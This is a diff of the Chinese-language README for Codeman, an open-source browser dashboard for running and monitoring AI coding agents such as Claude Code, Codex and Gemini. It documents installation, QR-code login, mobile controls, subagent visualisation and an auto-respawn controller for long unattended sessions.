If Codeman saves you time, <a href="https://github.com/Ark0N/Codeman/stargazers">a star</a> helps other people find it.<br>
|
||||
Bug reports and feature ideas are welcome in <a href="https://github.com/Ark0N/Codeman/issues">Issues</a>.
|
||||
</p>
|
||||
|
||||
@@ -5,7 +5,7 @@
|
||||
<h2 align="center">AI 编程智能体的任务控制中心</h2>
|
||||
|
||||
<p align="center">
|
||||
<em>Claude Code • OpenCode • Codex —— 统一仪表盘 • 任意设备</em>
|
||||
<em>Claude Code • OpenCode • Codex • Antigravity • Gemini • 终端 —— 统一仪表盘 • 任意设备</em>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
@@ -14,39 +14,73 @@
|
||||
|
||||
<p align="center">
|
||||
<a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-1e3a5f?style=flat-square" alt="License: MIT"></a>
|
||||
<a href="https://nodejs.org/"><img src="https://img.shields.io/badge/Node.js-18%2B-22c55e?style=flat-square&logo=node.js&logoColor=white" alt="Node.js 18+"></a>
|
||||
<a href="https://nodejs.org/"><img src="https://img.shields.io/badge/Node.js-22%2B-22c55e?style=flat-square&logo=node.js&logoColor=white" alt="Node.js 22+"></a>
|
||||
<a href="https://www.typescriptlang.org/"><img src="https://img.shields.io/badge/TypeScript-5.9-3b82f6?style=flat-square&logo=typescript&logoColor=white" alt="TypeScript 5.9"></a>
|
||||
<a href="https://fastify.dev/"><img src="https://img.shields.io/badge/Fastify-5.x-1e3a5f?style=flat-square&logo=fastify&logoColor=white" alt="Fastify"></a>
|
||||
<img src="https://img.shields.io/badge/Tests-2861%20total-22c55e?style=flat-square" alt="Tests">
|
||||
<a href="https://github.com/Ark0N/Codeman/graphs/contributors"><img src="https://img.shields.io/github/contributors/Ark0N/Codeman?style=flat-square&color=3b82f6" alt="Contributors"></a>
|
||||
<a href="https://github.com/Ark0N/Codeman/commits/master"><img src="https://img.shields.io/github/commit-activity/t/Ark0N/Codeman?style=flat-square&color=1e3a5f" alt="Total commits"></a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-demo.gif" alt="Codeman — 并行子智能体可视化" width="900">
|
||||
<img src="docs/images/subagent-demo-20260724.gif" alt="Codeman — 并行子智能体可视化" width="900">
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/codeman-tour-20260724.png" alt="Codeman 仪表盘导览:按项目分组的会话标签页、一键 Run 启动新智能体、页头实时用量" width="900">
|
||||
</p>
|
||||
|
||||
> 本文档由英文版 [`README.md`](README.md) 翻译而来。如有出入,以英文版为准。
|
||||
|
||||
---
|
||||
|
||||
## 快速开始 — 安装
|
||||
一行命令即可安装(macOS 和 Linux,Windows 通过 WSL):
|
||||
|
||||
```bash
|
||||
curl -fsSL https://raw.githubusercontent.com/Ark0N/Codeman/master/install.sh | bash
|
||||
curl -fsSL https://getcodeman.com/install | bash
|
||||
```
|
||||
|
||||
该脚本会在缺失时自动安装 Node.js 和 tmux,把 Codeman 克隆到 `~/.codeman/app` 并完成构建。
|
||||
|
||||
你至少需要安装一个 AI 编程 CLI —— [Claude Code](https://docs.anthropic.com/en/docs/claude-code)、[OpenCode](https://opencode.ai) 或 [Codex](https://developers.openai.com/codex/cli)(任意组合均可)。安装完成后:
|
||||
|
||||
```bash
|
||||
codeman web
|
||||
# 打开 http://localhost:3000,开启你的第一个会话
|
||||
```
|
||||
|
||||
安装器在每次系统改动前都会先询问;重跑同一条命令即可原地更新。详见[快速开始 — 安装](#快速开始--安装)。
|
||||
|
||||
---
|
||||
|
||||
## 快速开始 — 安装
|
||||
|
||||
```bash
|
||||
curl -fsSL https://getcodeman.com/install | bash
|
||||
```
|
||||
|
||||
该脚本会在缺失时自动安装 Node.js 和 tmux,把 Codeman 克隆到 `~/.codeman/app` 并完成构建。几点须知:
|
||||
|
||||
- **先询问,后改动。** 所有系统级改动(安装软件包、下载 AI CLI)都会先征求确认;结束时的菜单可选择:直接在本终端运行、安装为后台服务(systemd/launchd,开机自启),或暂不启动。不选就不会有任何后台进程。
|
||||
- **重跑即更新。** 再次运行同一条命令即可原地更新已完成的安装:`~/.codeman/app` 中的本地改动会被 stash(绝不丢弃),运行中的服务会自动重启并校验。若首次安装中途失败,重跑会继续完成完整的安装流程。也可以使用 `install.sh update` 与 `install.sh uninstall`。
|
||||
- **CI / 无终端环境:** 没有终端时,涉及系统改动的步骤会带着说明中止,而不是静默执行;在自动化场景设置 `CODEMAN_NONINTERACTIVE=1` 即可批准这些步骤。
|
||||
|
||||
你至少需要安装一个 AI 编程 CLI —— [Claude Code](https://docs.anthropic.com/en/docs/claude-code)、[OpenCode](https://opencode.ai)、[Codex](https://developers.openai.com/codex/cli)、[Antigravity](https://antigravity.google) 或 [Gemini CLI](https://github.com/google-gemini/gemini-cli)(任意组合均可;自 Google 面向消费者停售后,Gemini CLI 仅限企业版,Antigravity 是其继任者)。安装器会自动检测这五个中已安装的任意一个;若一个都没有,会提供安装 Claude Code 或 OpenCode 的选项,也可以选择跳过、稍后自行安装。安装完成后:
|
||||
|
||||
```bash
|
||||
codeman web
|
||||
# 打开 http://localhost:3000,开启你的第一个会话
|
||||
```
|
||||
|
||||
**想和小团队共用一台?** 改用多用户模式启动:每人拥有自己的登录与工作空间。
|
||||
|
||||
```bash
|
||||
codeman users add alice --admin # 创建第一个管理员账号
|
||||
codeman web --multiuser # 命名登录 + 按用户隔离的案例空间
|
||||
```
|
||||
|
||||
详见下文[多用户模式](#多用户模式可选启用)。
|
||||
|
||||
<details>
|
||||
<summary><strong>作为后台服务运行</strong></summary>
|
||||
|
||||
安装器结尾的菜单(选项 2)可以帮你完成这一步,并在宣告成功前校验服务确实已启动。如需手动配置:
|
||||
|
||||
**Linux(systemd):**
|
||||
|
||||
```bash
|
||||
mkdir -p ~/.config/systemd/user
|
||||
cat > ~/.config/systemd/user/codeman-web.service << EOF
|
||||
@@ -69,6 +103,7 @@ loginctl enable-linger $USER
|
||||
```
|
||||
|
||||
**macOS(launchd):**
|
||||
|
||||
```bash
|
||||
mkdir -p ~/Library/LaunchAgents
|
||||
cat > ~/Library/LaunchAgents/com.codeman.web.plist << EOF
|
||||
@@ -96,16 +131,18 @@ cat > ~/Library/LaunchAgents/com.codeman.web.plist << EOF
|
||||
EOF
|
||||
launchctl bootstrap gui/$(id -u) ~/Library/LaunchAgents/com.codeman.web.plist
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><strong>Windows(WSL)</strong></summary>
|
||||
|
||||
```powershell
|
||||
wsl bash -c "curl -fsSL https://raw.githubusercontent.com/Ark0N/Codeman/master/install.sh | bash"
|
||||
wsl bash -c "curl -fsSL https://getcodeman.com/install | bash"
|
||||
```
|
||||
|
||||
Codeman 依赖 tmux,因此 Windows 用户需要 [WSL](https://learn.microsoft.com/en-us/windows/wsl/install)。如果还没装 WSL:在管理员 PowerShell 中运行 `wsl --install`,重启,打开 Ubuntu,然后在 WSL 内安装你偏好的 AI 编程 CLI([Claude Code](https://docs.anthropic.com/en/docs/claude-code)、[OpenCode](https://opencode.ai) 或 [Codex](https://developers.openai.com/codex/cli))。安装完成后,即可从 Windows 浏览器访问 `http://localhost:3000`。
|
||||
Codeman 依赖 tmux,因此 Windows 用户需要 [WSL](https://learn.microsoft.com/en-us/windows/wsl/install)。如果还没装 WSL:在管理员 PowerShell 中运行 `wsl --install`,重启,打开 Ubuntu,然后在 WSL 内安装你偏好的 AI 编程 CLI([Claude Code](https://docs.anthropic.com/en/docs/claude-code)、[OpenCode](https://opencode.ai)、[Codex](https://developers.openai.com/codex/cli)、[Antigravity](https://antigravity.google) 或 [Gemini CLI](https://github.com/google-gemini/gemini-cli))。安装完成后,即可从 Windows 浏览器访问 `http://localhost:3000`。
|
||||
|
||||
</details>
|
||||
|
||||
---
|
||||
@@ -116,14 +153,12 @@ Codeman 依赖 tmux,因此 Windows 用户需要 [WSL](https://learn.microsoft.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-landing-qr.png" alt="移动端 — 带二维码认证的登录页" width="260"></td>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-session-idle.png" alt="移动端 — 带键盘配件栏的空闲会话" width="260"></td>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-session-active.png" alt="移动端 — 活动中的智能体会话" width="260"></td>
|
||||
<td align="center" width="40%"><img src="docs/screenshots/mobile-session-keyboard-20260727.png" alt="移动端 — 通过键盘配件栏与 Enter 按钮回答智能体的方案提示" width="300"></td>
|
||||
<td align="center" width="60%"><img src="docs/screenshots/mobile-toolbar-enter-20260727.png" alt="移动端工具栏:配件栏的 /init、/clear、剪贴板与 Esc,下方是 Run、案例、停止、Enter、语音与设置控件" width="440"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="center"><em>带二维码认证的登录页</em></td>
|
||||
<td align="center"><em>键盘配件栏</em></td>
|
||||
<td align="center"><em>智能体实时工作中</em></td>
|
||||
<td align="center"><em>触控回答提示</em></td>
|
||||
<td align="center"><em>配件栏 + 独立 Enter 按钮</em></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
@@ -142,23 +177,10 @@ Codeman 依赖 tmux,因此 Windows 用户需要 [WSL](https://learn.microsoft.
|
||||
<tr><td>在手机上手打密码</td><td><b>扫二维码 —— 即时认证</b></td></tr>
|
||||
</table>
|
||||
|
||||
### 安全的二维码认证
|
||||
|
||||
在手机键盘上输密码太痛苦了。Codeman 用**密码学安全的一次性二维码令牌**取而代之 —— 扫描桌面上显示的二维码,手机即刻完成认证。
|
||||
|
||||
每个二维码编码的是一个包含 6 字符短码的 URL,该短码在服务端映射到一个 256 位密钥(`crypto.randomBytes(32)`)。令牌每 **60 秒**自动轮换,**首次扫描即原子性消费**(重放永远失败),并采用**基于哈希的 `Map.get()` 查找**,不会通过响应时延泄露任何信息。短码只是一个不透明指针 —— 真正的密钥永远不会出现在浏览器历史、`Referer` 头或 Cloudflare 边缘日志中。
|
||||
|
||||
该安全设计覆盖了 ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin)(USENIX Security 2025,该研究发现 Top-100 网站中有 47 个存在漏洞)所指出的全部 6 个关键二维码认证缺陷:强制一次性使用、短 TTL、密码学随机性、服务端生成、扫描时桌面实时通知(QRLjacking 检测),以及 IP + User-Agent 会话绑定与手动吊销。双层速率限制(按 IP + 全局)使得在 62^6 = 568 亿种可能短码空间内进行暴力破解变得不可行。完整安全分析见:[`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
### 触控优化界面
|
||||
|
||||
- **键盘配件栏** —— 在虚拟键盘上方提供 `/init`、`/clear`、`/compact` 快捷按钮。破坏性命令(`/clear`、`/compact`)需双击确认 —— 第一次点击「上膛」,第二次点击执行 —— 这样在颠簸的通勤路上也不会误触
|
||||
- **滑动导航** —— 在终端上左右滑动切换会话(阈值 80px,300ms)
|
||||
- **智能键盘处理** —— 键盘弹出时工具栏与终端整体上移(使用 `visualViewport` API,并对 iOS 地址栏漂移设置 100px 阈值)
|
||||
- **安全区适配** —— 通过 `env(safe-area-inset-*)` 适配 iPhone 刘海与底部 Home 指示条
|
||||
- **44px 触控目标** —— 所有按钮均满足 iOS 人机界面指南的最小尺寸
|
||||
- **底部抽屉式 case 选择器** —— 用上滑模态框替代桌面端下拉菜单
|
||||
- **原生惯性滚动** —— `-webkit-overflow-scrolling: touch`,丝滑流畅
|
||||
- **键盘配件栏** —— 在虚拟键盘上方提供 `/init`、`/clear`、`/compact` 快捷按钮;破坏性命令需双击确认,绝不误触
|
||||
- **独立的 Enter 按钮** —— 以按键方式回放,先冲刷本地回显缓冲的文本,不会让内容滞留在屏幕上
|
||||
- **滑动导航与智能键盘处理** —— 左右滑动切换会话;键盘弹出时工具栏与终端整体上移(`visualViewport` API)
|
||||
- **为手机而生** —— 刘海与 Home 指示条的安全区适配、44px 触控目标、底部抽屉式 case 选择器、原生惯性滚动
|
||||
|
||||
```bash
|
||||
codeman web --https
|
||||
@@ -167,30 +189,86 @@ codeman web --https
|
||||
|
||||
> `localhost` 走纯 HTTP 即可。从其他设备访问时请使用 `--https`,或使用 [Tailscale](https://tailscale.com/)(推荐)—— 它提供私有网络,让你无需 TLS 证书即可从手机访问 `http://<tailscale-ip>:3000`。
|
||||
|
||||
### 安全的二维码认证
|
||||
|
||||
在手机键盘上输密码太痛苦了。Codeman 用**密码学安全的一次性二维码令牌**取而代之 —— 扫描桌面上显示的二维码,手机即刻完成认证。
|
||||
|
||||
每个二维码编码的是一个包含 6 字符短码的 URL,该短码在服务端映射到一个 256 位密钥(`crypto.randomBytes(32)`)。令牌每 **60 秒**自动轮换,**首次扫描即原子性消费**(重放永远失败),并采用**基于哈希的 `Map.get()` 查找**,不会通过响应时延泄露任何信息。短码只是一个不透明指针 —— 真正的密钥永远不会出现在浏览器历史、`Referer` 头或 Cloudflare 边缘日志中。
|
||||
|
||||
该安全设计覆盖了 ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin)(USENIX Security 2025,该研究发现 Top-100 网站中有 47 个存在漏洞)所指出的全部 6 个关键二维码认证缺陷:强制一次性使用、短 TTL、密码学随机性、服务端生成、扫描时桌面实时通知(QRLjacking 检测),以及 IP + User-Agent 会话绑定与手动吊销。双层速率限制(按 IP + 全局)使得在 62^6 = 568 亿种可能短码空间内进行暴力破解变得不可行。完整安全分析见:[`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
---
|
||||
|
||||
## 实时智能体可视化
|
||||
## 使用 Codeman —— 人类操作指南
|
||||
|
||||
实时观看后台智能体工作。Codeman 监控智能体活动,将每个智能体显示在一个可拖拽的浮动窗口中,并用「黑客帝国」风格的动态连接线连回父会话。
|
||||
从头到尾走一遍如何在浏览器里驾驭 Codeman。如果你刚装好,就从这里开始。
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-spawn.png" alt="子智能体可视化" width="900">
|
||||
</p>
|
||||
### 1. 启动服务器
|
||||
|
||||
- **浮动终端窗口** —— 每个智能体一个可拖拽、可调整大小的面板,带实时活动日志,逐条展示每一次工具调用、文件读取与进度更新
|
||||
- **连接线** —— 用动态绿色线条连接父会话与其子智能体,随智能体的产生与完成实时更新
|
||||
- **状态与模型徽标** —— 绿色(活动)、黄色(空闲)、蓝色(已完成)指示,并以 Haiku/Sonnet/Opus 的颜色编码区分模型
|
||||
- **自动行为** —— 窗口在产生时自动打开、完成时自动最小化,标签徽标显示「AGENT」或「AGENTS (n)」计数
|
||||
- **嵌套智能体** —— 支持 3 层层级(主会话 → 团队成员智能体 → 子-子智能体)
|
||||
```bash
|
||||
codeman web # localhost:3000(仅环回 —— 安全默认值)
|
||||
codeman web --port 8080 # 自定义端口(或设置 CODEMAN_PORT)
|
||||
codeman web --https # 自签名 TLS(仅远程访问时需要)
|
||||
codeman web -H 0.0.0.0 # 绑定局域网 —— 必须设置 CODEMAN_PASSWORD(见「安全」)
|
||||
```
|
||||
|
||||
**智能体团队(Agent Teams)** —— 一等公民式支持 Claude Code 原生的多智能体团队(`CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`)。`TeamWatcher` 轮询 `~/.claude/teams/`,将团队成员匹配到其主会话,并以实时子智能体窗口呈现,且具备**团队感知的空闲检测** —— 因此当团队成员仍在工作时,重生控制器不会被触发。详见 [`docs/agent-teams/`](docs/agent-teams/)。
|
||||
打开打印出的 URL。整个页面是一个单一仪表盘;下面的一切都在这里完成。
|
||||
|
||||
### 2. 创建你的第一个会话
|
||||
|
||||
点击 **+ New Session**(或 **Quick Start**)。一个会话就是一个运行在自己 tmux 终端里的 AI CLI。你可以选择:
|
||||
|
||||
| 字段 | 作用 |
|
||||
| ---------------------- | ------------------------------------------------------------------------------------------- |
|
||||
| **工作目录 / case** | 智能体操作的文件夹。「case」就是一个 Codeman 记住的命名工作目录。 |
|
||||
| **CLI / 运行模式** | `Claude`(默认)、`OpenCode`、`Codex`、`Antigravity`、`Gemini` 或 `Terminal`(普通 shell)。 |
|
||||
| **模型** | 每会话模型(App Settings → Claude Model)。软默认值 —— 会话内 `/model` 依然有效。 |
|
||||
| **Effort / Ultracode** | 推理力度(`low`–`max`),或用 `ultracode` 开启动态多智能体工作流。随时可用 `/effort` 切换。 |
|
||||
|
||||
点击启动 —— Codeman 通过真实 PTY 拉起 CLI,并经 SSE 流式传输到你的浏览器。
|
||||
|
||||
### 3. 读懂仪表盘
|
||||
|
||||
- **标签(顶部)** —— 每个会话一个。`Alt+1`–`9` 跳转,`Ctrl+Tab` 下一个,拖拽排序(标签顺序会跨设备同步)。
|
||||
- **终端(中央)** —— 真实的 `xterm.js` 终端;完整 TUI 正常渲染。直接输入并按 **Enter** 发送。`Shift+Enter` 插入换行。
|
||||
- **侧边面板** —— Respawn、Orchestrator、Cron、Subagents、Settings(从工具栏切换)。
|
||||
|
||||
### 4. 与智能体对话
|
||||
|
||||
- **直接在终端输入提示** —— 即使跨越重连,输入也是精确一次送达(连接中断绝不会丢失或重复发送提示)。
|
||||
- **粘贴或拖放图片**,直接进入会话。
|
||||
- **语音输入** —— `Ctrl+Shift+V`(Deepgram Nova-3,自动静音停止)。
|
||||
- **附件** —— 注册外部文件/文档,并内联预览 Office/PDF。
|
||||
|
||||
### 5. 让它自主运行
|
||||
|
||||
| 模式 | 用途 | 位置 |
|
||||
| ---------------- | --------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------ |
|
||||
| **Respawn** | 长时间无人值守运行 —— 空闲/限额时自动重启 CLI,带自适应时序。预设:`solo-work`、`overnight-autonomous` 等 | Respawn 标签页 |
|
||||
| **Orchestrator** | 把一个目标变成分阶段计划,并跨多个智能体推动完成。 | 编排器面板 |
|
||||
| **Cron** | 已保存的、命名的定时任务(`once`/`interval`/`daily`/`weekly`),到期时拉起会话并发送提示。 | ⏰ Cron 按钮(可选启用:App Settings → Display → Header Displays) |
|
||||
| **Auto-resume** | 订阅限额重置后自动继续。 | Respawn 标签页(顶部) |
|
||||
|
||||
### 6. 随时随地访问
|
||||
|
||||
- **手机/平板** —— UI 完全触控优化;扫描桌面上的**二维码**即可免密码登录。
|
||||
- **网络之外** —— `./scripts/tunnel.sh start` 打开一条 Cloudflare 隧道(先设置 `CODEMAN_PASSWORD`)。
|
||||
- **SSH** —— `sc` 选择器可从终端附着任意会话(`sc` 交互式,`sc 2` 快速附着,`sc -l` 列表)。
|
||||
|
||||
### 7. 运维与维护
|
||||
|
||||
- **App Settings** —— 模型、effort、权限启动模式、主题/皮肤、通知、显示开关、各 CLI 的专属选项,以及跨设备同步的自定义显示名称和按设备保存的英文/简体中文界面语言。
|
||||
- **自更新** —— git-clone 安装可在 **Settings → Updates** 中原地更新。
|
||||
- **部署你自己的改动** —— 见[开发](#开发)。
|
||||
|
||||
> ⚠️ **安全提示:** 如果你正在 Codeman 受管会话*内部*工作(`echo $CODEMAN_MUX` → `1`),绝不要直接运行 `tmux kill-session` / `pkill claude` —— 请使用 Web UI 或 `./scripts/tmux-manager.sh`。
|
||||
|
||||
---
|
||||
|
||||
## 零延迟输入叠加层
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/zerolag-demo.gif" alt="Zerolag 演示 —— 本地回显与服务端回显并排对比" width="900">
|
||||
<img src="docs/images/zerolag-demo-20260728.gif" alt="Zerolag 演示:两台手机并排对比,即时本地回显与 600ms-2.7s 服务端回显" width="900">
|
||||
</p>
|
||||
|
||||
远程访问你的编程智能体时(VPN、Tailscale、SSH 隧道),每次按键通常需要 200–300 毫秒往返。Codeman 实现了一套**受 Mosh 启发的本地回显系统**,无论延迟多高,打字都感觉即时。
|
||||
@@ -207,6 +285,30 @@ xterm.js 内部一个像素级精准的 DOM 叠加层以 0ms 渲染按键。后
|
||||
|
||||
---
|
||||
|
||||
## 实时智能体可视化
|
||||
|
||||
实时观看后台智能体工作。Codeman 监控智能体活动,将每个智能体显示在一个可拖拽的浮动窗口中,并用「黑客帝国」风格的动态连接线连回父会话。
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-windows-20260724.png" alt="子智能体可视化 —— 三个并行 Explore 智能体的浮动窗口与实时工具调用日志" width="900">
|
||||
</p>
|
||||
|
||||
- **浮动终端窗口** —— 每个智能体一个可拖拽、可调整大小的面板,带实时活动日志,逐条展示每一次工具调用、文件读取与进度更新
|
||||
- **连接线** —— 用动态绿色线条连接父会话与其子智能体,随智能体的产生与完成实时更新
|
||||
- **状态与模型徽标** —— 绿色(活动)、黄色(空闲)、蓝色(已完成)指示,并以 Haiku/Sonnet/Opus 的颜色编码区分模型
|
||||
- **自动行为** —— 窗口在产生时自动打开、完成时自动最小化,标签徽标显示「AGENT」或「AGENTS (n)」计数
|
||||
- **嵌套智能体** —— 支持 3 层层级(主会话 → 团队成员智能体 → 子-子智能体)
|
||||
|
||||
多智能体 Workflow 运行(「ultracode」)同样可视化:一个浮动运行窗口实时跟踪整个工作流,展示阶段、各智能体的 token 用量与当前工具:
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/ultracode-window-20260724.png" alt="Ultracode 工作流可视化 —— 实时运行窗口,含各智能体 token 与阶段" width="900">
|
||||
</p>
|
||||
|
||||
**智能体团队(Agent Teams)** —— 一等公民式支持 Claude Code 原生的多智能体团队(`CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`)。`TeamWatcher` 轮询 `~/.claude/teams/`,将团队成员匹配到其主会话,并以实时子智能体窗口呈现,且具备**团队感知的空闲检测** —— 因此当团队成员仍在工作时,重生控制器不会被触发。详见 [`docs/agent-teams/`](docs/agent-teams/)。
|
||||
|
||||
---
|
||||
|
||||
## 重生控制器(Respawn Controller)
|
||||
|
||||
自主工作的核心。当智能体进入空闲,重生控制器会检测到,发送继续提示,循环执行上下文管理命令以获得全新上下文,然后恢复工作 —— 可完全无人值守运行 **24 小时以上**。
|
||||
@@ -216,7 +318,7 @@ WATCHING → IDLE DETECTED → SEND UPDATE → /clear → /init → CONTINUE →
|
||||
```
|
||||
|
||||
- **多层空闲检测** —— 完成消息、AI 驱动的空闲检查、输出静默、token 稳定性
|
||||
- **用量限额自动恢复**(*可选,默认关闭*)—— 当 Claude 因订阅用量限额而停止("You've hit your limit · resets 3pm")时,Codeman 会解析重置时间,等到限额刷新(外加 2 分钟安全缓冲)后自动关闭限额对话框并发送 `continue`,让通宵任务平稳跨过 5 小时窗口而不是停摆到早晨。可识别 Claude Code 各版本的全部限额消息格式;若仍受限会自动重试;计划在 Codeman 重启后依然生效;暂停期间会阻止重生循环,避免 `/clear` 清掉等待中的对话。在会话 Respawn 标签页顶部按会话启用
|
||||
- **用量限额自动恢复**(_可选,默认关闭_)—— 当 Claude 因订阅用量限额而停止("You've hit your limit · resets 3pm")时,Codeman 会解析重置时间,等到限额刷新(外加 2 分钟安全缓冲)后自动关闭限额对话框并发送 `continue`,让通宵任务平稳跨过 5 小时窗口而不是停摆到早晨。可识别 Claude Code 各版本的全部限额消息格式;若仍受限会自动重试;计划在 Codeman 重启后依然生效;暂停期间会阻止重生循环,避免 `/clear` 清掉等待中的对话。在会话 Respawn 标签页顶部按会话启用
|
||||
- **熔断器** —— 当 Claude 卡住时防止重生抖动(CLOSED → HALF_OPEN → OPEN 状态,跟踪连续无进展与重复错误)
|
||||
- **健康评分** —— 0–100 健康分,分项涵盖循环成功率、熔断器状态、迭代进展与卡死恢复
|
||||
- **内置预设** —— `solo-work`(3s 空闲,60min)、`subagent-workflow`(45s,240min)、`team-lead`(90s,480min)、`ralph-todo`(8s,480min)、`overnight-autonomous`(10s,480min)
|
||||
@@ -233,7 +335,7 @@ WATCHING → IDLE DETECTED → SEND UPDATE → /clear → /init → CONTINUE →
|
||||
- **崩溃安全** —— 完整状态持久化在 `state.json` 的 `orchestrator` 键下,可在重启后存续
|
||||
- **可从 UI 或 API 驱动** —— 编排器面板,或 `POST /api/orchestrator/start` → `/approve` → `/status`(共 10 个端点)
|
||||
|
||||
> 与 Ralph(单会话自主循环)不同:编排器协调多阶段、多智能体执行。完整设计:[`docs/orchestrator-loop-architecture.md`](docs/orchestrator-loop-architecture.md)。
|
||||
> 完整设计:[`docs/orchestrator-loop-architecture.md`](docs/orchestrator-loop-architecture.md)。
|
||||
|
||||
---
|
||||
|
||||
@@ -241,14 +343,18 @@ WATCHING → IDLE DETECTED → SEND UPDATE → /clear → /init → CONTINUE →
|
||||
|
||||
运行 **20 个并行会话**且全程可见 —— 60fps 的实时 xterm.js 终端、按会话的 token 与成本跟踪、基于标签的导航,以及一键管理。
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/screenshots/multi-session-dashboard.png" alt="多会话仪表盘" width="800">
|
||||
</p>
|
||||
|
||||
### 持久化会话
|
||||
|
||||
每个会话都运行在 **tmux** 内 —— 会话可在服务器重启、网络中断与机器休眠后存续。启动时自动恢复,具备双重冗余。幽灵会话发现机制能找到孤立的 tmux 会话。受管会话带有环境标签,因此智能体不会杀掉自己的会话。
|
||||
|
||||
### 会话管理器与命令面板
|
||||
|
||||
`Ctrl/Cmd/Alt+K` 打开模糊搜索的会话面板;**Browse all sessions** 打开会话管理器:一份去重后的完整清单,涵盖 Codeman 所知的一切(活动会话、来自状态与生命周期历史的既往会话,以及 Claude 转录),每一行都显示其第一条与最近一条提示。
|
||||
|
||||
- **置顶(Pin)**:把会话固定到列表顶部。被置顶的会话甚至能挺过被杀掉(降级为一条轻量的已停止记录,依然可见、可恢复)。
|
||||
- **名称保留**:从会话管理器恢复既往会话时保留其原有名称,而不是生成一个新名称。
|
||||
- **跨设备标签顺序**:拖拽排序的标签顺序保存在服务端,你的排列会从桌面跟随到手机。
|
||||
|
||||
### 主机名感知的窗口标题
|
||||
|
||||
在多台主机上运行 Codeman(笔记本、开发机、NAS)?浏览器标签标题是 `codeman:<主机名>`,让你无需点进去就能分辨每个标签对应哪个后端:
|
||||
@@ -262,23 +368,15 @@ codeman web --title-hostname dev-box # codeman:dev-box(用于覆盖嘈
|
||||
|
||||
### 智能 Token 管理
|
||||
|
||||
| 阈值 | 动作 | 结果 |
|
||||
|-----------|--------|--------|
|
||||
| 阈值 | 动作 | 结果 |
|
||||
| --------------- | --------------- | ---------------------- |
|
||||
| **110k tokens** | 自动 `/compact` | 上下文被摘要,工作继续 |
|
||||
| **140k tokens** | 自动 `/clear` | 以 `/init` 全新开始 |
|
||||
| **140k tokens** | 自动 `/clear` | 以 `/init` 全新开始 |
|
||||
|
||||
### 通知
|
||||
|
||||
当会话需要关注时实时桌面提醒 —— `permission_prompt` 与 `elicitation_dialog` 触发关键的红色标签闪烁,`idle_prompt` 触发黄色闪烁。点击任意通知即可直接跳转到相关会话。Hook 按 case 目录自动配置。
|
||||
|
||||
### Ralph / Todo 跟踪
|
||||
|
||||
自动检测 Ralph 循环、`<promise>` 标签、TodoWrite 进度(`4/9 complete`)以及迭代计数器(`[5/50]`),并提供实时进度环与已用时间跟踪。
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/ralph-tracker-8tasks-44percent.png" alt="Ralph 循环跟踪" width="800">
|
||||
</p>
|
||||
|
||||
### 运行摘要(Run Summary)
|
||||
|
||||
点击任意会话标签上的图表图标,即可看到所发生一切的时间线 —— 重生周期、token 里程碑、自动 compact 触发、空闲/工作切换、hook 事件、错误等等。
|
||||
@@ -296,17 +394,70 @@ PTY 输出 → 16ms 服务端批处理 → DEC 2026 包裹 → SSE → 客户端
|
||||
## 更多特性
|
||||
|
||||
- **自更新** —— systemd/launchd 管理下的 git-clone 安装可在 **App Settings → Updates** 中原地更新:它会检测最新发行版,自动暂存(stash)脏工作树,并在服务重启期间流式展示构建进度(npm 安装会被报告为不可更新)
|
||||
- **多 CLI** —— 每个会话可选 **Claude Code**、**OpenCode** 或 **Codex**;环境变量前缀自动隔离(`CLAUDE_CODE_*`、`OPENCODE_*` 与 `CODEX_*`)。详见 [`docs/opencode-integration.md`](docs/opencode-integration.md)
|
||||
- **多 CLI** —— 每个会话可选 **Claude Code**、**OpenCode**、**Codex**、**Antigravity** 或 **Gemini**;环境变量前缀自动隔离(`CLAUDE_CODE_*`、`OPENCODE_*`、`CODEX_*`、`ANTIGRAVITY_*` 与 `GEMINI_*`/`GOOGLE_*`)。详见 [`docs/opencode-integration.md`](docs/opencode-integration.md)
|
||||
- **Docker 会话** —— 在隔离且加固的容器中运行案例。**Create New** 上勾选一个复选框即可用合理的默认值启动容器并在其中启动智能体;同一案例的多个会话共享一个容器;可将容器连同工作区导出为可移植的 `.tar.gz`,迁移到另一台机器。详见 [`docs/docker-cases.md`](docs/docker-cases.md)
|
||||
- **远程 SSH 会话**:把案例指向另一台机器,让智能体在那里一个持久的远程 tmux 中运行:SSH 断连不中断任务、自动重连,还能发现并附着主机上已在运行的会话。详见 [`docs/remote-sessions.md`](docs/remote-sessions.md)
|
||||
- **Effort 与 Ultracode** —— 设置每会话的默认 effort(`low`–`max`),或启用 **ultracode**(动态多智能体工作流)。这些都只是软默认值 —— 会话中可随时用 `/effort` 切换。扩展思考预算也可配置
|
||||
- **语音输入** —— 用 Deepgram Nova-3 口述提示(带 Web Speech API 回退):切换录音、自动静音停止、实时音量表(`Ctrl+Shift+V`)
|
||||
- **图像输入** —— 直接把图片粘贴或拖放进会话
|
||||
- **手势控制** *(可选)* —— 一个 MediaPipe 手部追踪叠加层,可徒手抓取/拖动会话窗口并捏合按钮。用 `CODEMAN_GESTURE=1` + App Settings → Display 启用
|
||||
